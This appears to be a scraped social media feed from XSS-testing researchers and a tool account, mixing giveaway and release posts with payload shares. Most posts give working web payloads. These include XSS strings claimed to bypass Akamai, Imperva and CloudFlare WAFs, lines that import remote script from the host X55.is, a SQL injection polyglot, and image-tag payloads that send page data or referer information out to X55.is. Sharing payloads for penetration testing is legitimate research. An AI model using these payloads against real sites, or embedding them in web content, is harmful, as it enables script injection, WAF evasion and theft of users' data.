One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. #hack2learn @KN0X55

RT @KN0X55: 🚨 KNOXSS GIVEAWAY July 2025. ✅ Follow us.✅ Like and share this. 🎁 Prize: KNOXSS Pro for 1 Month . 🏆 Results: July 7th (3 winner….

RT @BRuteLogic: This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".

Just another #XSS construct that some of you might find interesting and hopefully useful someday.

RT @KN0X55: *** KNOXSS GIVEAWAY June 2025 ***. Directions:. 1. Like.2. Share.3. Be a follower. Prize: KNOXSS Pro for 1 Month. Results: June….

RT @PaulosYibelo: Wild browser hack from @J0R1AN - a clean, convincing doubleclickjacking PoC that doesn’t rely on clicking specific spots.….

RT @BRuteLogic: Our blog was shutted down in the beginning of this year. But here's the Internet Archive version o….

Sometimes it doesn't take much to bypass a #WAF in a given #XSS context. For some of them, you will find that this very simple trick does the job. JavaScript%09:alert(1). Maybe you need to tweak the alert(1) a little bit but that's it.

The danger of #XSS when SOP can't help you. By @0dayWizard .

Mistake here, correct is:. 3. appendChild(createElement`script`).src='//X55.is'.

RT @BRuteLogic: Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is').htt….

$.getScript() requires jQuery library already loaded into the DOM.

Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is'). 3. appendChild(createElement'script').src='//X55.is'. Tip: use src attribute to store '//X55.is'. #hack2learn.

Our blog was shutted down in the beginning of this year. But here's the Internet Archive version of it, in case you are looking for:.

RT @KN0X55: KNOXSS v4.1.1 is out! 😎. Now with OPEN REDIRECT detection and proof!. Also with bug fixes and speed improvements. Available no….

This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".

RT @KN0X55: Try import('//X55.is') instead of alert(1)

RT @KN0X55: Here's our future test case for postMessage #XSS . There are 2 cases, one regular and another with fil….

RT @RodoAssis: SQLi Polyglot*. &1/*'/*"/**/||1#\. or. and-1/*'/*"/**/||1--+\. It performs injection on single and double quotes scenarios a….

RT @BRuteLogic: Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img….

Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img Src=//X55.is/d4t4/ OnError=location=src+DATA>. (REFERER data).<Img Src=//X55.is OnLoad=location=src>. => Redirect (w/ any subdomain).